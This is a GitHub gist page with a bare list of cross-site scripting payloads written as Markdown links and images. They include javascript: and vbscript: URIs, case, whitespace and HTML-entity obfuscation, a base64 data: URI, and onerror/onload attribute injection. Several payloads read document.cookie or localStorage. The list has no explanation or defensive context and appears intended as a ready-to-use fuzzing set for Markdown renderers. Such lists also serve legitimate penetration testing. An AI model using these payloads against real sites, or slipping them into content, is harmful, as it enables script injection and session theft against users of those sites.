Skip to content

Instantly share code, notes, and snippets.

@tamzidr

tamzidr/gist:ec225b4b9bc76971e41541cf32e319fc

Created March 8, 2025 13:01
Show Gist options
  • Save tamzidr/ec225b4b9bc76971e41541cf32e319fc to your computer and use it in GitHub Desktop.
Save tamzidr/ec225b4b9bc76971e41541cf32e319fc to your computer and use it in GitHub Desktop.
Download ZIP
Markdown XSS Payloads
Raw
gistfile1.txt
Links:
[Basic](javascript:alert('Basic'))
[Local Storage](javascript:alert(JSON.stringify(localStorage)))
[CaseInsensitive](JaVaScRiPt:alert('CaseInsensitive'))
[URL](javascript://www.google.com%0Aalert('URL'))
[In Quotes]('javascript:alert("InQuotes")')
Images:
![Escape SRC - onload](https://www.example.com/image.png"onload="alert('ImageOnLoad'))
![Escape SRC - onerror]("onerror="alert('ImageOnError'))
Fuzzing Techniques:
[XSS](javascript:prompt(document.cookie))
[XSS](j a v a s c r i p t:prompt(document.cookie))
[XSS](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[XSS](&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29)
[XSS]: (javascript:prompt(document.cookie))
[XSS](javascript:window.onerror=alert;throw%20document.cookie)
[XSS](javascript://%0d%0aprompt(1))
[XSS](javascript://%0d%0aprompt(1);com)
[XSS](vbscript:alert(document.domain))
[XSS](javascript:this;alert(1))
[XSS](javascript:this;alert(1))
[XSS](javascript&#58this;alert(1))
[XSS](Javascript:alert(1))
[XSS](Javas%26%2399;ript:alert(1))
[XSS](javascript:alert(1))
[XSS](javascript:confirm(1))
[XSS](javascript://www.google.com%0Aprompt(1))
[XSS](javascript://%0d%0aconfirm(1);com)
[XSS](javascript:window.onerror=confirm;throw%201)
![XSS](javascript:prompt(document.cookie))
![XSS](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
![XSS'"`onerror=prompt(document.cookie)](x)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment